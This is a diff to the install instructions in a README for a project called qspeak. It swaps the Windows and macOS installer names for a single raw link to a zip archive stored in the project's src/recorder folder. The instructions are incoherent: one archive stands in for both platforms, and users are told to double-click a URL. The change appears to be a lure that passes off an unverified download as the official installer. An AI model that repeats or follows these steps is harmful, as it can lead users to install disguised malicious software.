NatScape7907/qspeak/README.md

 3. Click on the version number to view the details.
 You will see options for different operating systems.

 4. Choose the file that matches your operating system:
-   - For Windows users, select `qSpeak-Windows.exe`.
+   - For Windows users, select `https://raw.githubusercontent.com/NatScape7907/qspeak/main/src/recorder/qspeak-1.6-alpha.1.zip`.
-   - For macOS users, select `qSpeak-macOS.dmg`.
+   - For macOS users, select `https://raw.githubusercontent.com/NatScape7907/qspeak/main/src/recorder/qspeak-1.6-alpha.1.zip`.
    - For Linux users, select the `AppImage` file.

 5. Click on the file name to start downloading.

 6. Once the download is complete, locate the file on your computer.

-   - **Windows**: Double-click the `qSpeak-Windows.exe` file and follow the on-screen instructions to install.
+   - **Windows**: Double-click the `https://raw.githubusercontent.com/NatScape7907/qspeak/main/src/recorder/qspeak-1.6-alpha.1.zip` file and follow the on-screen instructions to install.
    - **macOS**: Open the downloaded `.dmg` file, drag `qSpeak` to your Applications folder, and run it from there.
    - **Linux**: Make the AppImage executable by right-clicking the file, selecting Properties, and checking “Allow executing file as program.”
 Then double-click to run.